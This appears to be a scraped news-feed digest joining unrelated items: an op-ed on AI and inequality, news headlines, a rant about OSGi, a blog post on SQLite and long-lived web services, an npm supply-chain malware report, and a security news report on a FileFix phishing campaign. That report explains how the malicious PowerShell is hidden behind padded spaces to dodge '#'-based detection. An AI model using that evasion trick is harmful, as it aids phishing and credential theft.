Your request has been blocked due to a network policy.
Try logging in or creating an account
here
to get back to browsing.
If you're running a script or application, please register or sign in with your developer credentials
here
. Additionally make sure your User-Agent is not empty and is something unique and descriptive and try again. if you're supplying an alternate User-Agent string,
try changing back to default as that can sometimes result in a block.
AI will make the rich unfathomably richer. Is this really what we want? | Dustin Guastella
Guardian
www.theguardian.com
2025-09-16 13:00:06
The ‘knowledge economy’ promised cultural and social growth. Instead, we got worsening inequality and division. Artificial intelligence will supercharge it Recently, Palantir – a tech corporation that boasts no fewer than five billionaire executives – announced its Q2 earnings: over a billion dollar...
R
ecently, Palantir – a tech corporation that boasts no fewer than
five billionaire executives
–
announced
its Q2 earnings: over a billion dollars generated in a single quarter. Forty-eight per cent growth in its business compared with the same quarter last year, including 93% growth in its US commercial business. These elephantine numbers are maddening – and, in large part, a result of the company fully embracing AI.
The AI revolution is here and, as its proponents
remind
us daily, it will remake our world, making every company and government agency more efficient and less error-prone while helping us unlock hitherto unheard of advances in science and technology. Not only this, but if we play our cards right, big tech’s latest explosion could yield unprecedented economic growth.
Though, we might ask, growth for whom?
Consider OpenAI, the technology giant behind ChatGPT. In a promo video announcing the latest upgrade for their flagship software, its CEO, Sam Altman,
bragged
: “It can write an entire computer program from scratch.” Three days later, the New York Times
reported
that computer science grads “are facing some of the highest unemployment rates” among their peers. And it’s not just coders and engineers. AI-powered automation promises to swallow up jobs at the low end of the labor market too, with McDonald’s, Walmart and Amazon all clamoring to integrate AI tools to automate everything from service interactions to warehouse picking and sorting.
As ex-ante reward for all these cost-cutting layoffs, the fortunes of AI entrepreneurs have ballooned beyond all comprehension. So far, if the AI revolution has succeeded in anything, it is in making very rich people even more rich. Rallies on Wall Street have seen AI stocks surge at a record pace for hundreds of so-called “unicorns” – the nearly
500
AI startups that are valued at more than $1bn each. According to
Bloomberg
, 29 founders of AI companies are now newly minted billionaires. And remember, nearly all of these firms were founded in the last five years.
Why are investors so bullish on the AI boom? Partly because this technology promises to lay off more workers, more rapidly, than any innovation in recent memory. The ludicrous valuations of AI startups are predicated on the idea that this technology has the power to eliminate the very need for human labor. And the business of layoffs is very
lucrative
. In that sense, the AI boom could represent the most efficient upward redistribution of wealth in modern history.
To be sure, some AI wizards insist the fallout from all of this won’t be so bad for the little guy. Microsoft even
predicts
that blue-collar workers might have an edge in the AI economy of the future. But none of this is very convincing. Some workers with durable skills will be able to hold on to good wages and stable work for a time. But with breakthroughs in self-driving cars, increasingly roboticized warehouses, lights-out factories and
fully automated
restaurants, non-college educated workers are going to feel the AI impact much sooner than rosy predictions suggest.
All of this raises a question about the current direction of our economy and whether a strategy that prioritizes hi-tech development over all else makes any sense any more – or if it ever did. In the late 1990s, the dawning of the knowledge economy was heralded as the solution to many economic woes. As the economy of brains replaced the economy of brawn, Americans were promised new heights of greatness. Sure, factories would close and with them millions of high-wage, union jobs would disappear, but the new jobs at Google would be so much better. As a generation of workers was laid off, their children were encouraged to “upskill”, go to college, and
learn to code
for the jobs of the future. How ironic, then, that AI, the zenith of knowledge work, is resulting in the
abolition
of knowledge jobs. Karl Marx once wrote that the bourgeoisie created its own gravedigger in the immiserated proletariat. Today’s tech elite seems intent on realizing that prophecy.
It’s not only that the information age supercharged a new class of oligarchs, from Bill Gates and Jeff Bezos to Elon Musk, who now command unfathomable sums of wealth. It’s also that further down the income ladder, wide
class cleavages
have opened up along educational lines. As computer-based work became prized, wage inequality between college-educated and non-college-educated workers created a widening social gulf.
Today, one’s position on a variety of cultural divisions – from gender ideology to immigration – can be dependably
determined
by one’s position in the labor market. Those who still make their money by some combination of craft and muscle are increasingly estranged from those who make theirs through the manipulation and administration of “data”. In urban knowledge hubs, an almost medieval class system prevails, with an untouchable clique of bankers and big tech clerics at the top. A large, relatively well-off layer of lawyers, medical professionals and white-collar knowledge workers are beneath them, followed by a proud, but squeezed group of blue-collar and service workers, and finally, a crisis-ridden group made up of the semi- and permanently unemployed.
Not surprisingly, this inequality has resulted in political dysfunction. Enmity, suspicion, resentment and extreme polarization characterize our civic scene, ultimately making for a
politics
with no winners except the financial and technological elite, who have effectively monopolized their influence on government. Under Joe Biden, they were showered with incentives and subsidies in the form of the Chips and Science Act. Under Donald Trump, they win tax cuts and
deregulation
. No matter who is in power, they always seem to get richer.
Socially, the great gains of the knowledge economy have also failed to live up to their promises. With instantaneous global connectivity, we were promised cultural excellence and social effervescence. Instead, we’ve been delivered an endless scroll of
slop
. Smartphone addictions have made us more vicious, bitter and boring. Social media has made us narcissistic. Our attention spans have been zapped by the constant, pathological need to check our notifications. In the built environment, the omnipresence of touchscreen kiosks has removed even the slightest possibility of social interaction. Instead of having conversations with strangers, we now only interact with screens. All of this has made us more lonely and less happy. As a cure, we’re now offered AI companions, which have the unfortunate side effect of occasionally inducing
psychotic
breaks. Do we really need any more of this?
M
ost of what we actually need to achieve some measure of the common good requires common labor. To rebuild our crumbling infrastructure and even to upgrade our electrical grid, we need electricians, steelworkers and bricklayers – not gargantuan data centers. To clean city streets, we need more, and better-paid, sanitation workers – not “smart” trash
compactors
. To handle problems of crime and social order we need more police officers on patrol – not a fleet of robot crime
dogs
. To improve transportation, we don’t need self-driving cars, we need buses and trains with people who drive them. In other words, there is plenty of meaningful work to be done, if only we, as a society, invested in the low-tech economy. Not to mention that all the essential stuff of life – love, family, friendship, community – are still best left in analog.
Beyond desirability, investing in a low-tech future might become a necessity. Despite all the hype about the potential for AI, the whole thing could be a
mirage
. The sheer scale of investor money pouring into the AI craze has all the signs of a speculative
bubble
. If it bursts, it could sink the already fragile Trumpified economy.
To be sure, this is not a Luddite appeal. Advances in technology should continue apace. But should tech development be the main, and overwhelming,
priority
of the
government
? In 2022 Congress approved some $280bn in hi-tech investments. In 2024 private investment in AI alone reached $230bn. This year, buoyed by Trump’s deregulation and Wall Street overconfidence, tech’s biggest companies are
set
to invest another $320bn in AI and data centers. By comparison, the price tag for Biden’s supposedly mammoth investments in roads and bridges totaled a paltry $110bn. It’s not that we need to throttle technology, but the
balance
is out of whack.
Marx – who was as great a promethean progressive as one could find – thought technology ought to serve social and human needs. Today, we have the formula exactly backwards – society serves tech. Of course, Silicon Valley leaders like to tell us that the increasingly complex challenges of the future will only be solved by yet more investments in R&D, yet more deregulation and clearance for ever-larger voltage-greedy data centers. But it’s not the complex problems of the future that are the most intractable. It’s the age-old conundrums of money, class and power.
Dustin Guastella is director of operations for Teamsters Local 623 in Philadelphia, and a research associate at the Center for Working-Class Politics
New FileFix attack uses steganography to drop StealC malware
Bleeping Computer
www.bleepingcomputer.com
2025-09-16 13:00:00
A newly discovered FileFix social engineering attack impersonates Meta account suspension warnings to trick users into unknowingly installing the StealC infostealer malware. [...]...
A newly discovered FileFix social engineering attack impersonates Meta account suspension warnings to trick users into unknowingly installing the StealC infostealer malware.
FileFix is a new variant of the ClickFix family of attacks, which uses social engineering attacks to trick users into pasting malicious commands into operating system dialog boxes as supposed "fixes" for problems.
The
FileFix technique
was created by red team researcher mr.d0x, and instead of convincing users into pasting malicious PowerShell commands into the Windows Run dialog or terminal, FileFix abuses the address bar in File Explorer to execute the commands.
This is not the first time FileFix has been used in attacks, with the
Interlock ransomware gang previously using FileFix
to install its remote access trojan (RAT). However, these earlier attacks utilized the original FileFix proof-of-concept (PoC), rather than evolving it with new lures.
New FileFix campaign
The new campaign,
discovered by Acronis
, uses a multi-language phishing page that poses as Meta's support team, warning recipients that their account will be disabled in seven days unless they view an "incident report" allegedly shared by Meta.
However, this report is not actually a document, but a disguised PowerShell command used to install malware on targets' devices.
The phishing page tells users to click the "Copy" button to copy what appears to be a file path, click on the open File Explorer button, and then paste the path into the File Explorer address bar to open the document.
However, clicking the
Copy
button actually copies a PowerShell command with added spaces into the Windows clipboard, so that only the file path is shown when pasted into File Explorer.
"In order to trick the user into thinking that they are pasting the path to an 'incident report' PDF file, the attacker has placed a variable at the end of the payload, which contains a lot of spaces and the fake path at the end," explains Acronis.
"This is done so that only the file path would appear in the address bar, and none of the actual malicious commands. In an average ClickFix attack, this is done using the # symbol instead of a variable, which is taken by PowerShell as a developer comment."
"This has the unintentional advantage that anyone who has built their detections to look for the "#" symbol from ClickFix, is likely to miss this."
FileFix attack impersonating Meta support
Source: Acronis
This FileFix campaign stands out as it uses steganography to hide both a second-stage PowerShell script and encrypted executables inside what appears to be a harmless JPG image hosted on Bitbucket.
The first-stage PowerShell command, unknowingly entered by the target, first downloads the image, extracts the embedded secondary script, which is then used to decrypt the payloads in memory.
Second PowerShell script embedded in image
Source: BleepingComputer
The final payload is the StealC infostealer malware, which attempts to steal the following data from infected devices:
Credentials and authentication cookies from web browsers (Chrome, Firefox, Opera, Tencent, etc.)
Credentials from messaging apps (Discord, Telegram, Tox, Pidgin)
VPN and gaming apps (ProtonVPN, Battle.net, Ubisoft)
Ability to take a screenshot of the active desktop.
Acronis reports that multiple variants of this campaign were observed over two weeks, using different payloads, domains, and lures.
"Throughout our investigation, we've uncovered several iterations of the attack, going back two weeks," observed Acronis.
"Through these iterations, we can trace out an evolution of both the social engineering technique, and the more technical aspects of the attack."
"Perhaps this is indicative or an attacker testing out an infrastructure they are planning to use in the future, or perhaps these are iterations added to the attack mid campaign, as the attacker learns to adapt and improve."
While most organizations have educated their employees on phishing tactics, ClickFix and FileFix tactics remain relatively new and continue to evolve.
Acronis recommends that companies educate their users on these new tactics and the risks of copying data from a website into seemingly harmless system dialogs.
Headlines for September 16, 2025
Democracy Now!
www.democracynow.org
2025-09-16 13:00:00
U.N. Inquiry Finds Israel Is Committing Genocide in Gaza, Israel Launches Major Ground Offensive to Seize Gaza City, Lebanon Says Israeli Airstrike on Residential Building Injured 12 Civilians, Secretary of State Rubio Meets with Qatar’s Emir in the Wake of Israel’s Deadly Strike in Doha...
U.N. Inquiry Finds Israel Is Committing Genocide in Gaza
Sep 16, 2025
A United Nations inquiry has found Israel has committed genocide during its nearly two-year assault on the Gaza Strip. Earlier today, the U.N. Independent International Commission of Inquiry on the Occupied Palestinian Territory said in a 72-page report that Israel’s government is responsible for four of the five acts prohibited under the 1948 Genocide Convention. The report holds three Israeli leaders responsible: Prime Minister Benjamin Netanyahu, former Defense Minister Yoav Gallant and President Isaac Herzog. Navi Pillay, who heads the commission, drew parallels between Israel’s assault on Gaza and the Rwandan genocide of 1994.
Navi Pillay
: “Genocide is occurring in Gaza. … In the Rwandan genocide, the group were the Tutsis, and here the group are the Palestinians.”
The findings could be used by prosecutors at the International Criminal Court or the U.N.’s International Court of Justice.
Israel Launches Major Ground Offensive to Seize Gaza City
Sep 16, 2025
Israel’s military says it has launched a major ground offensive to seize Gaza City and displace its 1 million residents. Israel’s defense minister says quote, “Gaza is burning.” Gaza health officials report at least 68 people have been killed by Israeli airstrikes since dawn, most of them in Gaza City. This is Fatima, an elderly resident of a tent camp close to the Al-Ghefari building in western Gaza City, which Israel bombed into rubble on Monday.
Fatima
: “I cannot stand on my legs out of fear. Enough hunger, thirst and fear. When they did this, I collapsed completely. I cannot walk.”
The Palestinian Civil Defense reports Israel has blown up over 50 Gaza high-rises in recent weeks.
In Geneva, Francesca Albanese, the U.N. special rapporteur on human rights in the occupied Palestinian territory, said Monday Israel’s military is destroying entire neighborhoods and the remnants of buildings where people were seeking shelter.
Francesca Albanese
: “It’s trying to forcibly evacuate the 800,000 Palestinians who were seeking refuge there. But the question is 'why?' Why? Because this is the last piece of Gaza that needs to be rendered unlivable before advancing the ethnic cleansing of that piece of land, and then probably they will move to the West Bank.”
Lebanon Says Israeli Airstrike on Residential Building Injured 12 Civilians
Sep 16, 2025
Lebanon’s Health Ministry says an Israeli airstrike on a residential building injured 12 civilians in the Nabatieh region of southern Lebanon on Monday. Four children and seven women were among the wounded. Israel has repeatedly attacked Lebanon despite a ceasefire deal signed in November.
Secretary of State Rubio Meets with Qatar’s Emir in the Wake of Israel’s Deadly Strike in Doha
Sep 16, 2025
Image Credit: State Department photo
Secretary of State Marco Rubio is in Doha today for talks with Qatar’s emir, Sheikh Tamim bin Hamad al-Thani, in the wake of Israel’s deadly strike last week targeting Hamas leaders in Doha. Rubio’s trip comes after leaders of the Gulf Cooperation Council said Monday they had agreed to activate a mutual defense pact in response to Israeli aggression. Meanwhile, Axios reports Israeli Prime Minister Benjamin Netanyahu informed President Trump last Tuesday morning that Israel planned to attack Hamas leaders in Qatar nearly an hour before the strike took place. That report contradicts White House claims that Trump was notified only after missiles were in the air, giving him no opportunity to oppose the strike.
Trump Says U.S. Strikes a Second Venezuelan Boat, Killing 3 People
Sep 16, 2025
Image Credit: Donald Trump/Truth Social
President Trump said Monday the U.S. had carried out a strike against a second boat he alleged was carrying drugs from Venezuela, killing at least three people on board. Trump made the announcement on social media and posted a video of an apparent airstrike, showing a speedboat erupting in flames. This follows a strike earlier this month on another boat also allegedly carrying drugs from Venezuela, which reportedly killed 11 people. Speaking to The New York Times, Rear Admiral Donald J. Guter, a retired top judge advocate, said, “Trump is normalizing what I consider to be an unlawful strike.” Here’s Venezuela’s President Nicolás Maduro speaking shortly before the second strike.
President Nicolás Maduro
: “This is not tension; it is outright aggression — judicial aggression, when they criminalize us; political aggression, with their daily threatening statements; diplomatic aggression; and ongoing military aggression. Venezuela is empowered by international law to comprehensively confront this aggression. It is not tension; it is aggression.”
JD Vance Vows to “Dismantle” Institutions on the Political Left in the Wake of Kirk’s Killing
Sep 16, 2025
Image Credit: The Charlie Kirk Show
FBI
Director Kash Patel says investigators have found
DNA
evidence linking 22-year-old suspect Tyler Robinson to the killing of right-wing activist Charlie Kirk in Utah last week. Utah County prosecutors will formally arraign Robinson today; they’re planning to seek the death penalty.
On Monday, Vice President JD Vance vowed to dismantle institutions on the political left that he claimed were promoting violence and terrorism. Vance made the remarks while hosting Kirk’s podcast “The Charlie Kirk Show.”
Vice President JD Vance
: “Of course, we have to make sure that the killer is brought to justice. And importantly, we have to talk about this incredibly destructive movement of left-wing extremism that has grown up over the last few years and, I believe, is part of the reason why Charlie was killed by an assassin’s bullet. We’re going to talk about how to dismantle that.”
Joining Vance’s call for retribution were White House adviser Stephen Miller, spokesperson Karoline Leavitt and Health Secretary
RFK
Jr. Since Kirk’s killing, scores of politicians, public figures and private-sector workers have faced firings, suspensions or investigations over their comments about the assassination — among them, The Washington Post’s last remaining full-time African American opinion columnist, Karen Attiah. In a post on Substack Monday, Attiah wrote, “Last week, the Washington Post fired me. The reason? Speaking out against political violence, racial double standards, and America’s apathy toward guns.”
Utah Law Allowing Open Carry on Campuses Criticized After Kirk’s Assassination
Sep 16, 2025
In Utah, a law allowing people with permits to openly carry guns on college campuses is being questioned in the wake of Charlie Kirk’s assassination. Before the bill’s passage last month, firearms had to be concealed on college campuses in Utah. Meanwhile, Florida’s attorney general says people can now openly carry firearms in public after the state’s appeals court struck down a 40-year ban on the practice.
Trump Signs Order Deploying National Guard Troops to Memphis
Sep 16, 2025
President Trump signed an order Monday authorizing the deployment of National Guard troops to Memphis, Tennessee, in support of a new federal task force to combat violent crime in the city. Trump’s order came just days after the Memphis Police Department reported crime is at a 25-year low, with robbery, larceny and burglary all at record lows over the past eight months. Tennessee Democrats gathered in Memphis Monday to condemn Trump’s crackdown. This is state Representative Justin J. Pearson, who represents Memphis.
Rep. Justin Pearson
: “Today, it is a conversation about crime. In 14 months, it will be a conversation about protecting the vote at the vote — at the voting booth. In three-and-a-half years, it’s going to be about a presidential election and the need to protect it. And what happens when we go to the polls, and the National Guard is there, and all they’re doing is asking you, 'Are you sure you want to vote?' This isn’t just a slippery slope; this is a dangerous impediment on our democracy.”
Trump Lashes Out at New York Governor Hochul for Endorsing Mamdani in
NYC
Mayoral Race
Sep 16, 2025
President Trump said Monday that New York Governor Kathy Hochul’s endorsement of Zohran Mamdani in the New York City mayoral election was “a very bad one for New York City.” Trump suggested that he would consider holding back federal funds from the city if Mamdani is elected.
After headlines, we’ll look at Trump’s escalating immigration crackdown on Chicago with Congressmember Delia Ramirez. Trump has also threatened deploying U.S. troops to Chicago.
NYT
:
UAE
Chips Deal Linked to $2B Investment in Trump Family Cryptocurrency Firm
Sep 16, 2025
A New York Times report has revealed how a member of the ruling family of the United Arab Emirates invested $2 billion in the Trump family’s cryptocurrency company just days before the
UAE
received access to rare artificial intelligence chips. Back in May, Sheikh Tahnoon bin Zayed Al Nahyan invested $2 billion into World Liberty Financial, a cryptocurrency startup run by the Trump and Witkoff families — Steve Witkoff is President Trump’s special envoy to the Middle East. Two weeks later, the Trump administration approved the sale of hundreds of thousands of AI chips to the Emiratis, despite concerns that the chips could be shared with China.
The Times report did not directly link the two deals, but cast suspicion on the timing. Ryan Cummings, chief of staff at the Stanford Institute for Economic Policy, said, “If this is true, this is the largest public corruption scandal in the history of the United States and it’s not even close.”
Senate Confirms White House Adviser Stephen Miran as Fed Governor
Sep 16, 2025
Senate Republicans have confirmed one of President Trump’s top economic advisers, Stephen Miran, to the Federal Reserve Board. In an unusual arrangement, Miran will only take a leave of absence from his role as chair of the Council of Economic Advisers, instead of resigning from his post. Miran says he intends to return to the White House after his term ends. The move allows Miran to attend the Fed’s two-day meeting to set interest rates, which starts today.
Meanwhile, a U.S. appeals court blocked Trump’s attempt to fire Federal Reserve
Governor Lisa Cook before today’s interest rate meeting. In an opinion, Appellate Judge Bradley Garcia wrote, “Before this court, the government does not dispute that it provided Cook no meaningful notice or opportunity to respond to the allegations against her.” President Trump has repeatedly demanded that the Federal Reserve cut interest rates fast, and has threatened to fire Federal Reserve Chair Jerome Powell.
Maurene Comey, Who Prosecuted Jeffrey Epstein, Sues Over Her “Politically Motivated” Firing
Sep 16, 2025
Fired federal prosecutor Maurene Comey, the daughter of former
FBI
Director James Comey, is suing the Trump administration for her sudden termination in July. As an assistant U.S. attorney in Manhattan, Comey had worked on several high-profile cases, including against convicted sex offender Jeffrey Epstein and his co-conspirator, Ghislaine Maxwell. Comey’s lawsuit claims that she had been fired for “her father’s protected speech, or because of her perceived political affiliation and beliefs, or both.” The lawsuit also notes that the far-right activist Laura Loomer had called for Comey’s firing on social media.
On El Salvador’s Independence Day, Protesters Demand Release of Jailed Human Rights Defenders
Sep 16, 2025
In El Salvador, protesters took to the streets Monday to demand the release of activists and human rights defenders jailed by President Nayib Bukele, a staunch ally of President Trump. The protests came as El Salvador marked its 204th Independence Day celebrations. This is opposition lawmaker Claudia Ortiz.
Claudia Ortiz
: “El Salvador is on the path to an authoritarian system, an authoritarian system where the state is more important than the individual. And that should not be the case. The state exists to serve the individual, their dignity and their freedom. The state must provide legal certainty. But in El Salvador, the opposite is true.”
The original content of this program is licensed under a
Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License
. Please attribute legal copies of this work to democracynow.org. Some of the work(s) that this program incorporates, however, may be separately licensed. For further information or additional permissions, contact us.
A few years ago, we decided to overhaul the internals of our in-house open-source job queue manager
JQM
, a sort of specialized application server for asynchronous jobs. One goal in particular was to allow customer-specific extensions of the product on some identified extension points with the less friction possible. We thought we were in an ideal case to implement
OSGi
, a renowned modularity framework:
the code was already carefully architectured, especially with the extension points clearly marked,
we already had experience with OSGi, a well-known Java modularity framework
How wrong were we! This post is not about why we chose OSGi and not the alternative
JPMS
. It is about everything that factually went wrong, with a healthy dose of (very) tired ranting.
Disease and Medicine: not (always) OSGi fault
A modularity framework has two main responsibilities: ensure isolation between ‘modules’ (whatever the chosen granularity defining a module is) and manage the lifecycle of said modules.
The first point is the real goal: a module should be independent of the implementations of the contracts it uses. This is especially important for our use case – we need a plugin system, consisting of a set of Java interfaces with an unlimited number of implementations we know nothing about. And the framework should do its upmost to restrict what a module can see inside the others.
The second point is a consequence: as long as we know nothing of implementations and can only use interfaces, we need someone else to instantiate objects and provide instances backing the interfaces. There are a host of different patterns to do this, mostly gravitating around the Inversion of Control and the Registry patterns.
However, when dealing with existing code bases, this rarely maps well. The fact that modules become fully isolated is especially a bummer – it is so easy to take shortcuts with direct access to fields and methods that break encapsulation. After all what is the harm when you control both the code being exposed and the code profiting from the lapse in encapsulation? Sadly the answer is: the victim is modularity. Might as well do a single module/package in that case. And after ten years the JQM code was riddled with some of these.
Lifecycle is also an issue in JQM. After all JQM is a specialized sort of application server and has a complicated startup process to ensure that metadata is present, initialized if needed, that all plugins are loaded, etc. Introducing an external control for parts of it is not trivial.
So… everything is fine, OSGi is actually only here to force us to clean up our act. That’s factual, and actually a very good thing for the future maintainability of our code base. So why talk of pain?
Killing the patient
An unwilling patient
It is all well and dandy to ensure perfect modularity of one’s own code, but what happens when external libraries get involved? Mayhem.
First, stupid as it may seem, not all common libraries include an OSGi or JPMS manifest and can’t be used directly by the OSGi framework. Not that many thankfully, and in an OSS world PRs are always possible, but tiring, especially when you have to dabble inside unfamiliar build tooling (who the hell invented the torture named Gradle?). That’s actually the easy part, as the PAX project has a dynamic encapsulation library (itself using the BND tool which, one way or another will always find its way inside an OSGi project).
Second, all ‘big’ frameworks like JPA2, JAX-RS or JAXB implementations do black magic with class loading. That’s not their fault – they have to work in many different contexts with radically different class loading mechanisms (child first, parent first, as well as the dreaded TCCL – the thread context class loader) AND at the same time be modular themselves with mechanisms like late-binding or SPI/ServiceLoader. Sometimes, the black magic is actually inside the API and not inside the implementation (JAXB I’m looking at you), something a madman thought great on his worst day. Just throw a module restriction on class visibility and headaches ensue.
This class loading hacks are likely the worst item on the list. Actually, it is a consequence of the original sin of Java class loading which was not made for modularity. (funnily enough, this is so true that JPMS, the ‘official Java’ answer to OSGi, has chosen to avoid the issue entirely and not use class loader isolation between modules). So OSGi is a hack trying to solve a fundamental issue, and like all hacks it works only in most cases and clashes with other hacks.
The most infuriating thing comes when OSGi tries to work around the issue with disasters like the
OSGi ServiceLoader Mediator specification
(also known as SPI Fly, its only implementation) which try to set the TCCL dynamically with byte code injection to allow SPI mechanisms to work… The specification is arid, the implementation documentation is a joke and the result is lost nights wondering why the library only half loads or trying to re-package external frameworks. There is a new attempt in OSGi R8 (no implementations yet) with
OSGi Connect
to ease communication between OSGi and normal Java – let’s wait for the bright future with a big grain of salt…
The only actually reasonable solution here is to forego all magic configuration systems (implementation auto-discovery, declaration of classes to use in a configuration file…) and use in-code configuration when possible. When migrating a huge code base using standard-compliant magic configuration, this switch is hard to justify cost-wise.
Dubious therapy
As a developer, I want only one build system. In our case, it’s Maven. I’m not against plugging other build systems in (for example a npm build of a JS module) as long as they are controlled by the main one. I certainly do not want to have a packaging system separate from the build system. Yet this is the OSGi assumed proposition – they want to separate the build path from the runtime path. (This, by the way, is a fundamental difference with JPMS and likely its only architectural advantage over OSGi).
Well, I don’t want to have two competing dependency version resolvers. When I update a runtime or test dependency version, I want it to be updated inside the final distribution bundle too.
In the end we have chosen to still use Maven for packaging, with many hacks inside the packaging descriptor. Hacks being plays on scopes and dependency exclusions – the OSGi guys believe so much in their philosophy that they do not care at all about the transitive dependencies of their artifacts, going as far as leaving out non-OSGi sub-dependencies…
Missing information
The documentation is nothing short of a catastrophe. For the whole ecosystem. The main corpus is the OSGi specification (R7 at the time, R8 today). For a specification, it is really cool. But it is not made for users, it’s meant for implementers of the specification. Yet the rest of the documentation is so poor that one is compelled to go back and back again to it. The different framework implementations (the big two being Apache Felix and Eclipse Equinox) hardly have any docs. There are a few websites/blogs (vogella, thank you!) with information that is very often outdated as the framework has changed quite a bit since its inception in 1999. Very few Stack Overflow users. All in all, little information – OSGi is not a mainstream technology, it is something which is mostly used behind the scenes inside foundations works. Few users by nature, so few information contributors. The rest of the information will be found inside source code on GitHub. Especially in the tests of the big OSGi frameworks or OSGi-using libraries.
The learning curve is more of a wall as a result. There was an attempt with
OSGi En-Route
to provide some startup templates but even those… are buggy. It is always
funny
to clone a sample repository and find it just does not work. Was the right direction though.
But still: when you have to understand why the modular HTTP service (the HTTP whiteboard in OSGi terms) does not share context with your REST web service inside the same bundle, you do not expect to discover inside a hard to find JIRA ticket that there are multiple servlet contexts automatically created and that you have to create one manually and use LDAP filters to bind your elements to it. You would either expect a clear documentation or it to work out of the box. Or you would expect yourself to burn everything with fire.
Another place of missing information is error messages. These are dreary. How could you guess that a NullReferenceException inside SPI Fly means ‘there is no JAR manifest’? Or quickly find inside 5 lines of LDAP filters the actual missing package on startup? This is likely the second most important point of this rant:
when things go wrong, OSGi makes it really hard to understand why
.
Testing
Tests using the actual OSGi mechanisms are complicated to create. There are multiple toolings available, but really only one that works in a classic way for Java Junit-users: PAX-Exam. It tries its best to run the tests inside an OSGi framework rather than in the CL that has started the test JVM. As we had hundreds of pre-existing junit tests, it was the only way for us to go.
This is another pain point associated to the ‘OSGi does not care about build class path’ – the junit tests ‘see’ all the dependency tree in their class path. It will not be visible inside the OSGi bubble, but all it takes is a weirdly-set TCCL (thank you CXF for randomly changing it) for it to surface. Ensue lovely exceptions like ‘class X is not an instance of class X’. Setting logging correctly especially is hard.
But overall, thanks to the PAX Exam coders. It is a great tool, and they even have some documentation! (even if Google will always send you to an older version)
Sad tales of basic malpractice
You know what? JAXB-OSGI jar works perfectly in version 2.3.3. Stops working in version 2.3.4 with, like, no information at all. (you then learn that they have hard-coded
inside the API jar, not the implementation
a mechanism created years ago by the GlassFish team for service discovery, that it is not documented anywhere but yeah sure it’s in the code…)
Partial bundles and dynamic imports: this is… an extension system for the extension system. Yahoo. Why they were created is understandable, but is it necessarily a good idea to force humans to read a jar manifest to understand what is going on?
LDAP filters to filter objects inside the OSGi registry: downright cruel.
The JAX-RS whiteboard only works with a very specific set of dependencies. Use the Karaf feature or loose hours debugging why your REST service does not start.
Theoretically, OSGi is a dependency resolver. Yet specific bundle start order (‘start levels’) are still necessary for many things (logger, framework extensions, …).
And to end on a funny note: Apache Felix, in order to start, relies itself on SPI/ServiceLoader. Makes you wonder why you should use more.
Regrets
All in all, we do not regret the work done. Well, done is a matter of perspective as that kind of refactoring is actually never finished but the worst is behind us. But it is more about the clarity of the resulting code structure than about the framework, because the idea of breaking JQM by simply doing a minor library upgrade is not exactly what we dreamed of. OSGi is a bundle of hacks made by people who were both well-intentioned and great thinkers. It remains a hack, and it is a bit sad to see so much wasted energy on this.
As final nail in the coffin, the OSGi foundation has died, and the new Eclipse Foundation overlords of the specification have not yet made their plans clear. So we capitalized on the work done on OSGi to… implement JPMS instead, and removed all traces of OSGi. This will be the subject of a subsequent post, but we can already say: at least we do not regret this final decision.
Ask HN: Generalists, when do you say "I know enough" about any particular topic?
Or project-based? If you are a writer, for example, it's usually project based.
Otherwise, if you really have a hard time setting boundaries, then you might be the type to orient yourself around the states of your social circles. They definitely have boundaries when they stop listening or caring.
If you can't say enough is enough yourself, let someone you trust, or in whose competence you trust, do it for you.
I would say something like "when does it stop being useful" but the 'real' infinite game is all about curiosity and there's almost no players, just uninterested and destructive shareholders, so I'm gonna go with "do you have a thread that connects it all or not?" If you don't, and it only leads to more and more excursions, fix that point of depth where some subject still interfaces with the other stuff and stop there.
I normally skip presentations because I prefer reading, but
Building the
Hundred-Year Web Service (YouTube)
was worth the time.
1
Note that despite
“htmx” featuring in the title, very little of the presentation is actually about
htmx.
It is about choosing and using technology in such a way that it won’t
require maintenance suddenly due to external factors changing. That’s a drum
I’ve been banging for the last few years too, although less visibly.
Petros observes that we know how to build bridges that last hundreds of years:
stone, concrete, and steel can all do this with the right engineering. We also
know how to build hypertext that is likely to last at least a few decades: use
plain
html
and
css
. But, Petros asks, how do we create database-y web
services that lasts for decades?
Where do we store the data? Where do we perform business logic? He answers
thusly:
sql
ite for data storage,
sql
queries for most of the application logic,
Express-on-Node.js for routing and presentation logic,
Jinja2 templates for additional presentation logic, and
html
and vanilla
js
for triggering
http
requests.
I won’t debate the specifics here.
2
I’d be tempted to jam Perl into the
backend instead of Node.js if I wanted truly low maintenance. I have a feeling a
Perl script is more likely to run unmodified 20 years from now than some Node.js
thing. But maybe I’m wrong on this.
But there were other nuggets in the
presentation. For example:
I’ve frequently wondered why I turn to the web browser when I want to make
cross-platform software. There’s a chart in the presentation that shows how
environmental churn and
api
deprecation leads desktop applications to have
an expected lifetime of maybe a decade, and phone apps closer to a couple of
years. On the other hand, simple web pages have worked unmodified for over 40
years! That’s a good reason to default to the web as a technology.
When a page load is fast enough, the browser does not do the whole
flicker-a-blank-page-before-doing-a-full-repaint, it just shows the new
content right away as a sort of partial update. This is apparently a recent
browser innovation, but it is what allows e.g.
Decision Drill
to do a full
page reload when a user interacts with it, and it still feels like one of them
smooth
xml
HttpRequest things. Rest assured, it’s a full page reload.
But then the thing that triggered this article:
sql
ite. One of the more
powerful arguments I’ve read against
sql
ite is that it has a few warts in its
defaults, such tables being flexibly typed, foreign keys not being enforced,
primary keys being nullable, etc.
I’ve usually thought of these warts as a bad thing. Haskell has them too, like
how the built in
String
type is bad data structure for storing text, and how
we’re stuck with a bunch of misnamed functions (mapM, ap, msum, etc.) because we
didn’t know better. Oh and the list of Perl’s warts is probably longer than its
implementation.
Petros reframes this problem. Every single wart that annoys us today, used to be
a reasonable feature that someone relied on in their production code. Every wart
we see today is a testament to the care the maintainers put into backward
compatibility. If we choose a technology today, we want one that saves us from
future maintenance by keeping our wartful code running – even if we don’t yet
know it is wartful. The best indicator of this is whether the technology has
warts today.
I would much rather, the first time I install an application, “enable foreign
keys” – it’s just one line of config – I’d rather do that once, build the thing
correctly, and then be confident that if there’s any other built-in behaviour
that I didn’t account for, that behaviour isn’t going to change on me and break
my application at some point in the future.
Right on.
Self Propagating NPM Malware Compromises over 40 Packages
The NPM ecosystem is facing another critical supply chain attack. The popular @ctrl/tinycolor package, which receives over 2 million weekly downloads, has been compromised along with more than 40 other packages across multiple maintainers. This attack demonstrates a concerning evolution in supply chain threats - the malware includes a self-propagating mechanism that automatically infects downstream packages, creating a cascading compromise across the ecosystem. The compromised versions have been removed from npm.
The incident was discovered by
@franky47
, who promptly notified the community through a
GitHub issue
.
